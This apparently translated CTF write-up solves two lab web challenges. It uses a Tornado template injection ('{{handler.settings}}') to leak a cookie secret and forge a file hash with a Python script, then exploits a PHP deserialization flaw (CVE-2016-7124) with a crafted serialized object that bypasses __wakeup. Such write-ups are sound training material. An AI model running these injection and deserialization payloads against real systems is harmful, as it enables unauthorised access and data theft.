Article Directory
1. [护网杯2018]easy_tornado
The title hint is the template injection of tornado
Open the prompt file and find that the file name and file hash are required to access the file
hint.txt
Prompted filehash
calculation formula, but cookie_secret
unknown
flag.txt
Prompt the flag directory
Try to access the flag, give a hash value at random, and check the error report
Here is indeed tornado's template injection, construction variables
msg={
{
handler.settings}}
Got it cookie_secret
, you can calculate md5
Since tornado is based on Python, Python is used to complete md5 encryption
The following is the Python3 code:
import hashlib
cookie_secret = 'd82987f7-d38a-4b13-9487-2681dd17c8cc'
filename = '/fllllllllllllag'
#filename部分
result = hashlib.md5()
result.update(filename.encode('utf-8'))
r1=result.hexdigest()
#全部
result = hashlib.md5()
result.update((cookie_secret+r1).encode('utf-8'))
print(result.hexdigest())
Visit to get FLAG
2. [Geek Challenge 2019] PHP (CVE-2016-7124)
Visit the environment, prompting that the webpage has a backup
After trying many times, such as .bak, it is found to be www.zip
downloaded
Reading class.php
and index.php
documents
This is a deserialization problem. First, you need to select
assign a serialized object to
The object class name is Name
, this object contains username=admin
andpassword=100
But there are __wakeup()
functions that will change username
the value after assignment , so you need to bypass the __wakeup()
method
PHP vulnerability CVE-2016-7124 :
If there's magic in the function object __wakeup()
method, then again after calling unserilize()
method will first call before deserialization __wakeup()
method, but serialized string value representing the number of object properties is greater than the real__wakeup()
The execution will be skipped when the number of attributes
Write the PHP code as follows:
<?php
class Name{
private $username = "admin";
private $password = 100;
}
$Name = new Name;
echo serialize($Name);
?>
Get serialized results
O:4:"Name":2:{
s:14:" Name username";s:5:"admin";s:14:" Name password";i:100;}
The serialized object is composed as follows:
O:类名长度:类名:变量个数:{s:变量1名长度:变量1名;s:变量1值长度:变量1值(str);s:变量2名长度:变量2名;i:变量2值(int);......}
Need to modify the following content:
- Change the number of variables>=2, in order to bypass
__wakeup()
- Modify the space of the variable name to %00, in order to URL encode the space
?select=O:4:"Name":3:{
s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}
GET to get FLAG
Finish
Welcome to leave a message in the comment area.
Thanks for browsing